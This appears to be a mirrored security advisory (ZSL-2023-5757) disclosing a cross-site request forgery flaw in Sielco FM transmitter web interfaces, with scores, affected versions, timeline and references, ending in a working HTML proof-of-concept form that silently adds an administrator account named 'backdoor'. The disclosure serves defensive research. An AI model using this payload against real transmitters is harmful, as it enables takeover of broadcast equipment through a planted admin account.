Lucene search

Gjoko KrsticZSL-2023-5757

HistoryMar 28, 2023 - 12:00 a.m.

Sielco Analog FM Transmitter 2.12 Cross-Site Request Forgery

2023-03-2800:00:00

Gjoko Krstic

zeroscience.mk

126

sienco fm transmitter

cross-site request forgery

vulnerability

impact

exploit

analog

digital

broadcast

http

validation

exploit-db

packet storm security

ibm x-force

cisa

nvd

cve

zero science lab

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

8.6 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

24.3%

JSON

Title: Sielco Analog FM Transmitter 2.12 Cross-Site Request Forgery
Advisory ID: ZSL-2023-5757
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (4/5)
Release Date: 28.03.2023

Summary

Sielco designs and produces FM radio transmitters for professional broadcasting. The in-house laboratory develops standard and customised solutions to meet all needs. Whether digital or analogue, each product is studied to ensure reliability, resistance over time and a high standard of safety. Sielco transmitters are distributed throughout the world and serve many radios in Europe, South America, Africa, Oceania and China.

Description

The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Vendor

Sielco S.r.l - <https://www.sielco.org>

Affected Version

2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)

Tested On

lwIP/2.1.1
Web/3.0.3

Vendor Status

[26.01.2023] Vulnerability discovered.
[27.01.2023] Contact with the vendor and CSIRT Italia.
[27.03.2023] No response from the vendor.
[27.03.2023] No response from the CSIRT team.
[28.03.2023] Public security advisory released.

PoC

sielco_fm_csrf.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.exploit-db.com/exploits/51364>
[2] <https://packetstormsecurity.com/files/171838/>
[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/253076>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/269707>
[5] <https://www.cisa.gov/news-events/ics-advisories/icsa-23-299-08>
[6] <https://nvd.nist.gov/vuln/detail/CVE-2023-45317>
[7] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-45317>

Changelog

[28.03.2023] - Initial release
[02.11.2023] - Added reference [1], [2], [3], [4], [5], [6] and [7]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<!--

Sielco Analog FM Transmitter 2.12 Cross-Site Request Forgery


Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
                  2.12 (EXC120GX)
                  2.11 (EXC300GX)
                  2.10 (EXC1600GX)
                  2.10 (EXC2000GX)
                  2.08 (EXC1600GX)
                  2.08 (EXC1000GX)
                  2.07 (EXC3000GX)
                  2.06 (EXC5000GX)
                  1.7.7 (EXC30GT)
                  1.7.4 (EXC300GT)
                  1.7.4 (EXC100GT)
                  1.7.4 (EXC5000GT)
                  1.6.3 (EXC1000GT)
                  1.5.4 (EXC120GT)

Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.

Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.

Tested on: lwIP/2.1.1
           Web/3.0.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5757
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5757.php


26.01.2023

--><html><body><p>CSRF Add Admin:
---------------


  </p>
<form action="http://transmitter/protect/users.htm" method="POST">
<input name="pwd0" type="hidden" value=""/>
<input name="pwd0bis" type="hidden" value=""/>
<input name="user1" type="hidden" value=""/>
<input name="pwd1" type="hidden" value=""/>
<input name="pwd1bis" type="hidden" value=""/>
<input name="auth1" type="hidden" value=""/>
<input name="user2" type="hidden" value=""/>
<input name="pwd2" type="hidden" value=""/>
<input name="pwd2bis" type="hidden" value=""/>
<input name="auth2" type="hidden" value=""/>
<input name="user3" type="hidden" value="backdoor"/>
<input name="pwd3" type="hidden" value="backdoor123"/>
<input name="pwd3bis" type="hidden" value="backdoor123"/>
<input name="auth3" type="hidden" value="2"/>
<input type="submit" value="Adminize!"/>
</form>
</body></html>

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

8.6 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

24.3%

JSON

Related for ZSL-2023-5757